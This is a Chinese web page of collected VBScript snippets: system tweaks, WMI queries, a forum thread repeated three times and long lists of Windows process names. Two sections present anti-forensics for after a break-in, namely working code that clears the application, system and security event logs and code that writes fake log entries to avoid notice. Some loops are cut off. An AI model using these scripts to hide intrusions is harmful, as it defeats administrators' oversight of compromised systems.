VBS 常用总汇_IT900学习网

1 VBS

VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识，现在大家对它也开始重视起来。VBS代码在本地是通过Windows Script Host(WSH)解释执行的。VBS脚本的执行离不开WSH，WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH，用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在Windows 2000下，还可用WSH来访问Windows NT活动目录服务。

用VBS编写的脚本程序在窗口界面是由wscript.exe文件解释执行的，在字符界面由cscript.exe文件解释执行。wscript.exe是一个脚本语言解释器，正是它使得脚本可以被执行，就象执行批处理一样。关于VBS大家一定比我熟悉多了，所以再不废话，直接进入主题，看看我总结的VBS在系统安全中的八则妙用吧。

一、给注册表编辑器解锁

用记事本编辑如下内容：

DIM WSH

SET WSH=WSCRIPT.CreateObject("WSCRIPT.SHELL") ’击活WScript.Shell对象

WSH.POPUP("解锁注册表编辑器!")

’显示弹出信息“解锁注册表编辑器!”

WSH.Regwrite"HKCU/Software/Microsoft/Windows/CurrentVersion

/Policies/System/DisableRegistryTools",0,"REG_DWORD"

’给注册表编辑器解锁

WSH.POPUP("注册表解锁成功!")

’显示弹出信息“注册表解锁成功!”

保存为以.vbs为扩展名的文件，使用时双击即可。

二、关闭Win NT/2000的默认共享

用记事本编辑如下内容：

Dim WSHShell’定义变量

set WSHShell=CreateObject("WScript.shell") ’创建一个能与操作系统沟通的对象WSHShell

Dim fso,dc

Set fso=CreateObject("Scripting.FileSystemObject")’创建文件系统对象

set dc=fso.Drives ’获取所有驱动器盘符

For Each d in dc

Dim str

WSHShell.run("net share"&d.driveletter &"$ /delete")’关闭所有驱动器的隐藏共享

WSHShell.run("net share admin$ /delete")

WSHShell.run("net share ipc$ /delete")’关闭admin$和ipc$管道共享

现在来测试一下，先打开cmd.exe，输入net share命令就可以看到自己机子上的共享。双击执行stopshare.vbs后，会看见窗口一闪而过。然后再在cmd里输入net share命令，这时候没有发现共享列表了

三、显示本机IP地址

有许多时候，我们需要知道本机的IP地址，使用各种软件虽然可以办到，但用VBS脚本也非常的方便。用记事本编辑如下内容：

Dim WS

Set WS=CreateObject("MSWinsock.Winsock")

IPAddress=WS.LocalIP

MsgBox "Local IP=" & IPAddress

将上面的内容保存为ShowIP.vbs，双击执行即可得到本机IP地址。

四、利用脚本编程删除日志

入侵系统成功后黑客做的第一件事便是清除日志，如果以图形界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，可以在命令行下先停止，再删除，在命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是很困难的，实际上不是这样，比方说利用脚本编程中的VMI就可以删除日志，而且非常的简单方便。源代码如下：

strComputer= "."

Set objWMIService = GetObject("winmgmts:" _

& "{impersonationLevel=impersonate,(Backup)}!//" & _

strComputer & "/root/cimv2")

dim mylogs(3)

mylogs(1)="application"

mylogs(2)="system"

mylogs(3)="security"

for Each logs in mylogs

Set colLogFiles=objWMIService.ExecQuery _

("Select * from Win32_NTEventLogFile where LogFileName=’"&logs&"’")

For Each objLogfile in colLogFiles

objLogFile.ClearEventLog()

2 VBS

将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中，首先获得object对象，然后利用其clearEventLog()方法删除日志。建立一个数组，application,security,system，如果还有其他日志也可以加入数组。然后用一个for循环，删除数组中的每一个元素，即各个日志。

五、利用脚本伪造日志

删除日志后，任何一个有头脑的管理员面对空空的日志，马上就会反应过来被入侵了，所以一个聪明的黑客的学会如何伪造日志。利用脚本编程中的eventlog方法创造日志非常简单，请看下面的代码：

set ws=wscript.createobject("Wscript.shell")

ws.logevent 0 ,"write log success" ’创建一个成功执行日志

将上面的代码保存为createlog.vbs即可。这段代码很容易理解，首先获得wscript的一个shell对象，然后利用shell对象的logevent方法。logevent的用法：logevent eventtype,"description" [,remote system]，其中eventtype为日志类型，可以使用的参数如下：0代表成功执行，1执行出错，2警告，4信息，8成功审计，16故障审计。所以上面代码中，把0改为1,2,4,8,16均可，引号中的内容为日志描述。利用这种方法写的日志有一个缺点，即只能写到应用程序日志，而且日志来源只能为WSH，即Windows Scripting Host，所以不能起太多的隐蔽作用，在此仅供大家参考。

六、禁用开始菜单选项

用记事本编辑如下内容：

Dim ChangeStartMenu

Set ChangeStartMenu=WScript.CreateObject("WScript.Shell")

RegPath="HKCR/Software/Microsoft/Windows/CurrentVersion/Policies/"

Type_Name="REG_DWORD"

Key_Data=1

StartMenu_Run="NoRun"

StartMenu_Find="NoFind"

StartMenu_Close="NoClose"

Sub Change(Argument)

ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name

MsgBox("Success!")

End Sub

Call Change(StartMenu_Run) ’禁用“开始”菜单中的“运行”功能

Call Change(StartMenu_Find) ’禁用“开始”菜单中的“查找”功能

Call Change(StartMenu_Close) ’禁用“开始”菜单中的“关闭系统”功能

将以上代码保存为ChangeStartMenu.vbs文件，使用时双击即可。

七、执行外部程序

用记事本编辑如下内容：

DIM objShell

set objShell=wscript.createObject("wscript.shell")

iReturn=objShell.Run("cmd.exe /C set var=world", 1, TRUE)

保存为.vbs文件即可。在这段代码中，我们首先设置了一个环境变量，其名为var，而值为world，用户可以使用%Comspec%来代替cmd.exe，并且可以把命令：set var=world改成其它的命令，这样就可以使它可以运行任意的命令。

八、重新启动指定的IIS服务

用记事本编辑如下内容：

Const ADS_SERVICE_STOPPED = 1

Set objComputer = GetObject("WinNT://MYCOMPUTER,computer")

Set objService = objComputer.GetObject("Service","MYSERVICE")

If (objService.Status = ADS_SERVICE_STOPPED) Then

objService.Start

End If

将它以startsvc.vbs为名保存在C盘根目录。并通过如下命令执行：cscript c:/startsvc.vbs。运行后，经你指定的IIS服务项将被重新开启。

最后，我们再说说开篇时提到的VBS脚本病毒的防范方法。VBS病毒的执行离不开WSH，在带给人们便利的同时，WSH也为病毒的传播留下可乘之机。所以要想防范VBS病毒，可以选择将WSH卸载，只要打开控制面板，找到“添加/删除程序”，点选“Windows安装程序”，再鼠标双击其中的“附件”一项，然后再在打开的窗口中将“Windows Scripting Host”一项的“√”去掉，然后连续点两次“确定”就可以将WSH卸载。或者，你也可以点击“我的电脑”→“查看”→“文件夹选项”，在弹出的对话框中，点击“文件类型”，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射，都可以达到防范VBS脚本病毒的目的。

3 如何确定哪些 USB 设备已连接到计算机上？

strComputer = "."

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

Set colDevices = objWMIService.ExecQuery _

("Select * From Win32_USBControllerDevice")

For Each objDevice in colDevices

strDeviceName = objDevice.Dependent

strQuotes = Chr(34)

strDeviceName = Replace(strDeviceName, strQuotes, "")

arrDeviceNames = Split(strDeviceName, "=")

strDeviceName = arrDeviceNames(1)

Set colUSBDevices = objWMIService.ExecQuery _

("Select * From Win32_PnPEntity Where DeviceID = '" & strDeviceName & "'")

For Each objUSBDevice in colUSBDevices

Wscript.Echo objUSBDevice.Description

4 如何在指定的一段时间后自动消除消息框？

Const wshYes = 6

Const wshNo = 7

Const wshYesNoDialog = 4

Const wshQuestionMark = 32

Set objShell = CreateObject("Wscript.Shell")

intReturn = objShell.Popup("Do you want to delete this file?", _

10, "Delete File", wshYesNoDialog + wshQuestionMark)

If intReturn = wshYes Then

Wscript.Echo "You clicked the Yes button."

ElseIf intReturn = wshNo Then

Wscript.Echo "You clicked the No button."

Else

Wscript.Echo "The popup timed out."

End If

5 回复 4：如何在指定的一段时间后自动消除消息框？

Const wshYes = 6

Const wshNo = 7

Const wshYesNoDialog = 4

Const wshQuestionMark = 32

Set objShell = CreateObject("Wscript.Shell")

Set objFSO = CreateObject("Scripting.FileSystemObject")

intReturn = objShell.Popup("Do you want to delete this file?", _

10, "Delete File", wshYesNoDialog + wshQuestionMark)

If intReturn = wshNo Then

Wscript.Quit

End If

objFSO.DeleteFile("c:/scripts/test.vbs")

6 回复：VBS

http://www.microsoft.com/china/technet/community/scriptcenter/resources/qanda/default.mspx

7 如何在脚本中使用多选对话框？

Set objDialog = CreateObject("UserAccounts.CommonDialog")

objDialog.Filter = "VBScript Scripts|*.vbs|All Files|*.*"

objDialog.Flags = &H0200

objDialog.FilterIndex = 1

objDialog.InitialDir = "C:/Scripts"

intResult = objDialog.ShowOpen

If intResult = 0 Then

Wscript.Quit

Else

arrFiles = Split(objDialog.FileName, " ")

For i = 1 to Ubound(arrFiles)

strFile = arrFiles(0) & arrFiles(i)

Wscript.Echo strFile

End If

8 如何确定计算机上是否存在某个文件夹？

Set objNetwork = CreateObject("Wscript.Network")

strUser = objNetwork.UserName

strPath = "C:/Documents and Settings/" & strUser & "/Application Data/Microsoft/Templates"

Set objFSO = CreateObject("Scripting.FileSystemObject")

If objFSO.FolderExists(strPath) Then

Wscript.Echo "The folder exists."

Else

Wscript.Echo "The folder does not exist."

End If

9 如何列出文件夹及其所有子文件夹中的文件？

strComputer = "."

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

strFolderName = "c:/scripts"

Set colSubfolders = objWMIService.ExecQuery _

("Associators of {Win32_Directory.Name='" & strFolderName & "'} " _

& "Where AssocClass = Win32_Subdirectory " _

& "ResultRole = PartComponent")

For Each objFolder in colSubfolders

GetSubFolders strFolderName

Sub GetSubFolders(strFolderName)

Set colSubfolders2 = objWMIService.ExecQuery _

("Associators of {Win32_Directory.Name='" & strFolderName & "'} " _

& "Where AssocClass = Win32_Subdirectory " _

& "ResultRole = PartComponent")

For Each objFolder2 in colSubfolders2

strFolderName = objFolder2.Name

Wscript.Echo objFolder2.Name

GetSubFolders strFolderName

End Sub

10 回复 9：如何列出文件夹及其所有子文件夹中的文件？

strComputer = "."

Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")

strFolderName = "c:/scripts"

Set colSubfolders = objWMIService.ExecQuery _

("Associators of {Win32_Directory.Name='" & strFolderName & "'} " _

& "Where AssocClass = Win32_Subdirectory " _

& "ResultRole = PartComponent")

Wscript.Echo strFolderName

arrFolderPath = Split(strFolderName, "/")

strNewPath = ""

For i = 1 to Ubound(arrFolderPath)

strNewPath = strNewPath & "//" & arrFolderPath(i)

strPath = strNewPath & "//"

Set colFiles = objWMIService.ExecQuery _

("Select * from CIM_DataFile where Path = '" & strPath & "'")

For Each objFile in colFiles

Wscript.Echo objFile.Name

For Each objFolder in colSubfolders

GetSubFolders strFolderName

Sub GetSubFolders(strFolderName)

Set colSubfolders2 = objWMIService.ExecQuery _

("Associators of {Win32_Directory.Name='" & strFolderName & "'} " _

& "Where AssocClass = Win32_Subdirectory " _

& "ResultRole = PartComponent")

For Each objFolder2 in colSubfolders2

strFolderName = objFolder2.Name

Wscript.Echo

Wscript.Echo objFolder2.Name

arrFolderPath = Split(strFolderName, "/")

strNewPath = ""

For i = 1 to Ubound(arrFolderPath)

strNewPath = strNewPath & "//" & arrFolderPath(i)

strPath = strNewPath & "//"

Set colFiles = objWMIService.ExecQuery _

("Select * from CIM_DataFile where Path = '" & strPath & "'")

For Each objFile in colFiles

Wscript.Echo objFile.Name

GetSubFolders strFolderName

End Sub

11 如何在脚本播放一个声音？

strSoundFile = "C:/Windows/Media/Notify.wav"

Set objShell = CreateObject("Wscript.Shell")

strCommand = "sndrec32 /play /close " & chr(34) & strSoundFile & chr(34)

objShell.Run strCommand, 0, True

12 如何在消息框中显示一个超链接？

Set objShell = CreateObject("Wscript.Shell")

intMessage = Msgbox("Would you like to apply for access to this resource?", _

vbYesNo, "Access Denied")

If intMessage = vbYes Then

objShell.Run("http://www.microsoft.com")

Else

Wscript.Quit

End If

13 如何创建Wscript对象呢？

我想使用asp启动服务器端的notepad，下面是msdn里面的一个例子

Example

' This fragment launches Notepad with the current executed script

Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run ("notepad " & Wscript.ScriptFullName)

WshShell.Run ("windir/notepad" & Wscript.ScriptFullName)

然而出现了下面的一个错误提示

Error Type:

Microsoft VBScript runtime (0x800A01A8)

Object required: 'Wscript'

是不是我还要建立wscript的对象还是别的原因呢？

希望能得到大家的指点。

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:34:16Z 得分:0

大家帮帮忙吧

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:38:29Z 得分:0

Set WshShell = Server.CreateObject("Wscript.Shell")

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:39:32Z 得分:0

Set WshShell = CreateObject("Wscript.Shell")

WshShell.Run ("notepad")

</script>

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:52:32Z 得分:0

您好,我的浏览器的提示是

ActiveX component can't create the object 'wscript.shell'

我例子上面也用同样方法来建立那个wscript对象。

但也是不行，是不是服务器又要设置什么的，我的是英文版的xp＋iis

btw：这种方法是用来启动Server还是Client的程序的呢？

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 10:01:22Z 得分:0

我把internet options里面的Security的initilize and script Activex controls not marked as safe 设为了Enable之后就可以运行了。

但那就是说只是启动了Client端的程序，而不能启动Server端的程序了？

主题：如何创建Wscript对象呢？

我想使用asp启动服务器端的notepad，下面是msdn里面的一个例子

Example

' This fragment launches Notepad with the current executed script

Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run ("notepad " & Wscript.ScriptFullName)

WshShell.Run ("windir/notepad" & Wscript.ScriptFullName)

然而出现了下面的一个错误提示

Error Type:

Microsoft VBScript runtime (0x800A01A8)

Object required: 'Wscript'

是不是我还要建立wscript的对象还是别的原因呢？

希望能得到大家的指点。

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:34:16Z 得分:0

大家帮帮忙吧

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:38:29Z 得分:0

Set WshShell = Server.CreateObject("Wscript.Shell")

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:39:32Z 得分:0

Set WshShell = CreateObject("Wscript.Shell")

WshShell.Run ("notepad")

</script>

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:52:32Z 得分:0

您好,我的浏览器的提示是

ActiveX component can't create the object 'wscript.shell'

我例子上面也用同样方法来建立那个wscript对象。

但也是不行，是不是服务器又要设置什么的，我的是英文版的xp＋iis

btw：这种方法是用来启动Server还是Client的程序的呢？

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 10:01:22Z 得分:0

我把internet options里面的Security的initilize and script Activex controls not marked as safe 设为了Enable之后就可以运行了。

但那就是说只是启动了Client端的程序，而不能启动Server端的程序了？

主题：如何创建Wscript对象呢？

我想使用asp启动服务器端的notepad，下面是msdn里面的一个例子

Example

' This fragment launches Notepad with the current executed script

Set WshShell = Wscript.CreateObject("Wscript.Shell")

WshShell.Run ("notepad " & Wscript.ScriptFullName)

WshShell.Run ("windir/notepad" & Wscript.ScriptFullName)

然而出现了下面的一个错误提示

Error Type:

Microsoft VBScript runtime (0x800A01A8)

Object required: 'Wscript'

是不是我还要建立wscript的对象还是别的原因呢？

希望能得到大家的指点。

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:34:16Z 得分:0

大家帮帮忙吧

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:38:29Z 得分:0

Set WshShell = Server.CreateObject("Wscript.Shell")

Top

回复人： net_lover(孟子E章) ( ) 信誉：847 2003-04-27 09:39:32Z 得分:0

Set WshShell = CreateObject("Wscript.Shell")

WshShell.Run ("notepad")

</script>

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 09:52:32Z 得分:0

您好,我的浏览器的提示是

ActiveX component can't create the object 'wscript.shell'

我例子上面也用同样方法来建立那个wscript对象。

但也是不行，是不是服务器又要设置什么的，我的是英文版的xp＋iis

btw：这种方法是用来启动Server还是Client的程序的呢？

Top

回复人： chikin(饭饭) ( ) 信誉：81 2003-04-27 10:01:22Z 得分:0

我把internet options里面的Security的initilize and script Activex controls not marked as safe 设为了Enable之后就可以运行了。

但那就是说只是启动了Client端的程序，而不能启动Server端的程序了？

14 进程知识库

进程知识库

wscript - wscript.exe - 进程信息

进程文件： wscript 或者 wscript.exe

进程名称： Microsoft Windows Script Host

描述：

wscript.exe是微软Microsoft Windows操作系统脚本相关支持程序。

出品者： Microsoft Corp.

属于： Microsoft Windows Script Host

系统进程：否

后台程序：否

使用网络：否

硬件相关：否

常见错误：未知N/A

内存使用：未知N/A

安全等级 (0-5): 0

间谍软件：否

Adware: 否

病毒：否

木马：否

应用程序进程列表

Top Applications

[System Process] 000stthk.exe 1xconfig.exe

3dm2.exe AcctMgr.exe acrobat.exe

acrord32.exe acrotray.exe ACS.exe

acsd.exe adgjdet.exe AdobeUpdateManager.exe

adservice.exe adusermon.exe agent.exe

agrsmmsg.exe AgtServ.exe aim.exe

aim95.exe AIT alogserv.exe

anvshell.exe AOLacsd.exe AOLDial.exe

aom.exe apntex.exe apoint.exe

asfagent.exe ashWebSv.exe astart.exe

ati2evxx.exe ATIevxx.exe atiptaxx.exe

atrack.exe aupdate.exe autochk.exe

avconsol.exe AVENGINE.EXE avgserv.exe

avgupsvc.exe avgw.exe avpcc.exe

avsynmgr.exe backweb-137903.exe backweb-8876480.exe

bacstray.exe bcmsmmsg.exe blackd.exe

bpcpost.exe BRMFRSMG.EXE brss01a.exe

BRSVC01A.EXE bttnserv.exe ca.exe

calc.exe carpserv.exe CCAP.EXE

ccapp.exe ccevtmgr.exe ccproxy.exe

ccpxysvc.exe ccregvfy.exe cdac11ba.exe

cdantsrv.exe cdplayer.exe cfd.exe

cfgwiz.exe cftmon.exe charmap.exe

cleanup.exe cli.exe cmanager.exe

cmmpu.exe Companion.exe comsmd.exe

cpd.exe crypserv.exe crypserv.exe

cthelper.exe ctnotify.exe ctsvccda.exe

cvpnd.exe dadapp.exe dadtray.exe

damon.exe dap.exe DavCData.exe

dcfssvc.exe ddcman.exe defwatch.exe

delayrun.exe devenv.exe devldr.exe

devldr16.exe devldr32.exe dfrgntfs.exe

digstream.exe directcd.exe dit.exe

ditexp.exe dkservice.exe dlg.exe

dllcmd32.exe dmadmin.exe dpmw32.exe

dpps2.exe dragdiag.exe drwtsn32.exe

dsentry.exe dvzmsgr.exe dw.exe

dwrcs.exe dwwin.exe dxdllreg.exe

e_s10ic2.exe EasyShare.exe eausbkbd.exe

eEBSvc.exe em_exec.exe essspk.exe

evntsvc.exe excel.exe ezsp_px.exe

findfast.exe firedaemon.exe firefox.exe

flash.exe FrameworkService.exe full.exe

fxssvc.exe fxsvr2.exe gamechannel.exe

gbpoll.exe gcastdtserv.exe gcIPtoHostQueue.exe

gearsec.exe ghost_2.exe gwmdmmsg.exe

hc.exe helpctr.exe helper.exe

helpinst.exe hh.exe hijackthis.exe

hkcmd.exe hl.exe hndlrsvc.exe

hpcmpmgr.exe hpgs2wnd.exe hpgs2wnf.exe

hphmon05.exe hpoevm06.exe hpoevm08.exe

hpoevm09.exe hposts08.exe hpotdd01.exe

HPQTRA08.EXE hpsysdrv.exe hpzipm12.exe

hpztsb01.exe hpztsb02.exe hpztsb04.exe

hpztsb05.exe hpztsb06.exe hpztsb07.exe

hpztsb08.exe htpatch.exe iamapp.exe

iao.exe iap.exe icepack.exe

ico.exe icq.exe icwconn1.exe

ie5setup.exe ie6setup.exe igfxtray.exe

imgicon.exe InoRT.exe installstub.exe

instantaccess.exe ipmon32.exe iPodManager.exe

ipodservice.exe iPodWatcher.exe irmon.exe

isafe.exe issch.exe ISSVC.exe

isuspm.exe iTunesHelper.exe iw.exe

java.exe javaw.exe JDBGMGR.EXE

jusched.exe kav.exe kazaa.exe

kbd.exe KEM.exe khalmnpr.exe

19 其它进程列表

createcd.exe createcd50.exe crsss.exe

csinject.exe csinsm32.exe csinsmnt.exe

Csrrs.exe csrsc.exe csrss32.exe

ct_load.exe ctbclick.exe ctdvddet.exe

cteaxspl.exe ctfmon32.exe ctrlvol.exe

ctsrreg.exe ctsysvol.exe cusrvc.exe

cuteftp.exe cutftp.exe cyb2k.exe

cygrunsrv.exe cz.exe d4.exe

daconfig.exe daemon.exe datalayer.exe

ddhelper32.exe de_serv.exe defscangui.exe

delldmi.exe dellmmkb.exe delmsbb.exe

desk98.exe DeskAdKeep.exe DeskAdServ.exe

dexplore.exe diagent.exe dialer.exe

directx.exe directxset.exe dla.exe

dlgli.exe dlt.exe dluca.exe

dmremote.exe dmxlauncher.exe dnar.exe

dnetc.exe dns.exe download.exe

downloadplus.exe dragdrop.exe dreamweaver.exe

drgtodsc.exe drivespeed.exe drvddll.exe

drvlsnr.exe DRWTSN16.EXE dsagnt.exe

dseraser.exe dslagent.exe dslmon.exe

dsnthapp.exe dsnthser.exe dvdlauncher.exe

DVDRegionFree.exe dvldr32.exe dvremind.exe

DWHeartbeatMonitor.exe DxDebugService.exe DXEnum.exe

dxnf.exe e-s0bic1.exe e_s0hic1.exe

e_srcv03.exe eabservr.exe EasyAV.exe

ebrr.exe edisk.exe edonkey.exe

ee.exe ehmsas.exe ehrec.exe

ehSched.exe ehshell.exe ehtray.exe

elbycheck.exe elccest.exe emule.exe

enbiei.exe encmontr.exe engutil.exe

ensmix32.exe enternet.exe essdc.exe

eudora.exe eusexe.exe EvtEng.exe

expl32.exe explorer32.exe explorere.exe

express.exe exshow95.exe ezejmnap.exe

ezulumain.exe fameh32.exe fan.exe

farmmext.exe fastdown.exe faxsvc.exe

fbdirect.exe fc.exe fch32.exe

fgadmin.exe fih32.exe finder.exe

flashfxp.exe flashksk.exe flatbed.exe

fnrb32.exe FONTVIEW.EXE forte.exe

fpdisp4.exe fpxpress.exe frameworkservic.exe

freedom.exe frontpage.exe frsk.exe

fs20.exe fsaa.exe fsav32.exe

fsbwlan.exe fsdfwd.exe fsg.exe

fsg_3202.exe fsgk32.exe fsgk32st.exe

fsm32.exe fsma32.exe fsmb32.exe

fsscrctl.exe fssm32.exe fsw.exe

ftpte.exe fts.exe fwenc.exe

fxredir.exe gah95on6.exe gain_trickler_3202.exe

gbtray.exe gcASCleaner.exe gcasDtServ.exe

gcasInstallHelper.exe gcASNotice.exe gcasServ.exe

gcasServAlert.exe gcasSWUpdater.exe gdonkey.exe

gesfm32.exe gfxacc.exe Ghostexp.exe

GHOSTS_2.EXE ghoststartservice.exe ghoststarttrayapp.exe

giantantispywaremain.exe GIANTAntiSpywareUpdater.exe gnetmous.exe

gnotify.exe go.exe GoogleDesktop.exe

gozilla.exe gra.exe graph.exe

GrpWise.exe gsicon.exe gstartup.exe

gtwatch.exe gwmdmpi.exe gwsystemservice.exe

hcontrol.exe helpexp.exe HelpHost.exe

helpsvc.exe hhw.exe hidden32.exe

hjym.exe hkserv.exe hkss.exe

hkwnd.exe hotkeyapp.exe hotsync.exe

hottray.exe hpbpro.exe hpdrv.exe

hphmon03.exe hphmon04.exe hphmon06.exe

hphupd04.exe hphupd05.exe hphupd06.exe

hpnra.exe hpobnz08.exe hpoddt01.exe

hpodev07.exe hpoevm07.exe hpohmr08.exe

hpoopm07.exe hposol08.exe hpqcmon.exe

hpqgalry.exe hpsjvxd.exe hpwuschd.exe

HPWuSchd2.exe hpzstatn.exe hpztsb03.exe

hpztsb09.exe hpztsb10.exe htmdeng.exe

hypertrm.exe i8kfangui.exe iaanotif.exe

iaantmon.exe ibmpmsvc.exe iconfig.exe

icqlite.exe icsmgr.exe icwconn2.exe

20 其它进程列表

icwtutor.exe iexpiore.exe iexplore32.exe

iFrmewrk.exe igfxsrvc.dll ImageDrive.exe

IMApp.exe IMEKRMIG.EXE imjpmig.exe

imonnt.exe imontray.exe imscinst.exe

incd.exe InCDsrv.exe IncMail.exe

incredimail.exe inetd32.exe InfoTool.exe

inicio.exe initsdk.exe inotask.exe

IntelMEM.exe internet.exe ipclient.exe

ipssvc.exe ireike.exe isignup.exe

islp2sta.exe ismserv.exe isstart.exe

itouch.exe iwctrl.exe ixapplet.exe

JAMMER2ND.EXE javaws.exe jetcar.exe

jucheck.exe jushed.exe jushed32.exe

kavsvc.exe kazaalite.exe KB891711.EXE

kencapi.exe kencli.exe kencron.exe

kendns.exe kenftpgw.exe keninet.exe

kenmail.exe kenmap.exe kenproxy.exe

kenserv.exe kensocks.exe kentbcli.exe

kernal32.exe keyhook.exe keylogger.exe

keyword.exe KHALMNPR.exe khooker.exe

kmw_run.exe kodakccs.exe kodakimage.exe

kodakprv.exe kodorjan.exe kpf4gui.exe

lao.exe launch.exe launchap.exe

launcher.exe launchpd.exe leerlaufprozess

lexplore.exe lexstart.exe lights.exe

lmgrd.exe lmpdpsrv.exe load32.exe

logitray.exe logon.exe lorena.exe

LSAS.exe Lsass32.exe lsassa.exe

lsasss.exe lsserv.exe ltcm000c.exe

ltdmgr.exe ltmoh.exe ltmsg.exe

lxdboxcp.exe main.exe mainserv.exe

manager.exe mapiicon.exe master.exe

matcli.exe mathchk.exe mbm4.exe

mbm5.exe mc.exe mcagent.exe

mcappins.exe mcdlc.exe McEPOC.exe

McEPOCfg.exe mcinfo.exe mcmnhdlr.exe

mcpalmcfg.exe mcpserver.exe mcupdate.exe

mcvsshld.exe McWCE.exe McWCECfg.exe

mediaaccess.exe MediaAccK.exe mediaman.exe

mediapass.exe mediapassk.exe members-area.exe

memorymeter.exe messenger.exe mgactrl.exe

mgaqdesk.exe mgasc.exe mgavrtcl.exe

mgui.exe mhotkey.exe microsoft.exe

mim.exe minibug.exe minilog.exe

mirc.exe MIRC32.exe mm_server.exe

mmdiag.exe mmtray.exe mmtray2k.exe

mmtraylsi.exe mmups.exe mmusbkb2.exe

mnsvc.exe mnyexpr.exe monitor.exe

monitr32.exe morpheus.exe moviemk.exe

movieplace.exe Mozilla.exe mp3serch.exe

mpbtn.exe mpf.exe mpfagent.exe

mpfservice.exe mpftray.exe mpservic.exe

mpsetup.exe mqtgsvc.exe msaccess.exe

msams.exe msc32.exe mscifapp.exe

mscnsz.exe mscommand.exe msconfig32.exe

mscvb32.exe MSD.EXE mse7.exe

msg32.exe msgloop.exe msgplus.exe

mskagent.exe msmgs.exe msndc.exe

MSNIASVC.EXE msoffice.exe mspmspv.exe

mspub.exe msqry32.exe msscli.exe

mssearch.exe msstat.exe mssvr.exe

mstore.exe MSupdate.exe msvcmm32.exe

mtx.exe muamgr.exe musirc4.71.exe

mwd.exe mxoaldr.exe mxtask.exe

myfastupdate.exe mysqld-nt.exe nail.exe

naimag32.exe navapp.exe nbj.exe

nbr.exe nclaunch.exe nddeagnt.exe

NDSTray.exe neo.exe neoCapture.exe

neoCopy.exe neoDVD.exe neoDVDstd.exe

neotrace.exe nero.exe nerosmartstart.exe

nerosvc.exe netmail.exe netsurf.exe

newdot.exe newsupd.exe ngctw32.exe

nilaunch.exe NIP.exe nipsvc.exe

NJeeves.exe nkvmon.exe noads.exe

notify.exe npfmntor.exe NPFMSG.exe

npscheck.exe npssvc.exe NRMENCTB.exe

nscheck.exe nsl.exe NSMdtr.exe

NSMdtr.exe nsvr.exe nsvsvc.exe

nt_usdm.exe ntaskldr.exe ntfrs.exe

ntmulti.exe ntrtscan.exe NVCOAS.exe

21 其它进程列表

NVCPL.EXE NVCSched.exe nvmctray

nvsvc.exe nwtray.exe Nymse.exe

ocxdll.exe oeloader.exe ois.exe

Olehelp.exe Omniserv.exe onetouch.exe

oodag.exe opera.exe opware12.exe

owmngr.exe P2P Networking2.exe P2P Networking3.exe

pacis.exe PACKAGER.EXE packethsvc.exe

pav.exe pavfires.exe pavsrv51.exe

pcard.exe pccclient.exe pccguide.exe

pccnt.exe pccntmon.exe pccntupd.exe

PcCtlCom.exe pcfmgr.exe pchbutton.exe

pcscan.exe PCTVoice.exe pdsched.exe

PDVDServ.exe persfw.exe pg_ctl.exe

pgptray.exe phbase.exe photoshop.exe

picsvr.exe pinball.exe pkjobs.exe

plauto.exe player.exe plguni.exe

pmr.exe pmxinit.exe pop3pack.exe

popupkiller.exe postgres.exe postmaster.exe

pow.exe powerdvd.exe powerkey.exe

powerpnt.exe powers.exe ppmemcheck.exe

pptd40nt.exe pptview.exe ppwebcap.exe

pqhelper.exe PQIBrowser.exe PQIMountSvc.exe

pqinit.exe pqtray.exe PQV2ISECURITY.EXE

pqv2isvc.exe printnow.exe PRISMSTA.EXE

PRISMSVR.EXE profiler.exe proflwiz.exe

pruttct.exe psdrvcheck.exe psimsvc.exe

pssvc.exe pts.exe ptssvc.exe

pull.exe PureVoice.exe pvlsvr.exe

qbdagent2002.exe qbupdate.exe qclean.exe

qconsvc.exe qctray.exe qcwlicon.exe

qdcsfs.exe Qoeloader.exe qtaet2s.exe

qtask.exe qtzgacer.exe QuickBooks

quickdcf.exe quickres.exe quicktimeplayer.exe

qvp32.exe Radio.exe RadioSvr.EXE

randomdigits.exe rapapp.exe rasman.exe

RAVMOND.exe rcapi.exe rds.exe

reader_sl.exe realjbox.exe realmon.exe

realpopup.exe realshed.exe register.exe

regloadr.exe regsrv.exe RegSrvc.exe

regsvc32.exe remind.exe Remind_XP.exe

remind32.exe reminder.exe removed.exe

remupd.exe retrorun.exe rftray.exe

rlid.exe RM_SV.exe rosnmgr.exe

rsrcmtr.exe rtlrack.exe rtmanager.exe

rtmc.exe rtmservice.exe rtos.exe

rtvscn95.exe runservice.exe s24evmon.exe

s3tray2.exe sage.exe saimon.exe

saproxy.exe sbdrvdet.exe sbserv.exe

sbsetup.exe scanexplicit.exe ScanMailOutLook.exe

scanregistry.exe scanserver.exe scards32.exe

scardsvr32.exe scbar.exe sccenter.exe

scchost.exe SCHDPL32.EXE schedhlp.exe

schedul2.exe scheduler.exe schedulerv2.exe

schost.exe schupd.exe scm.exe

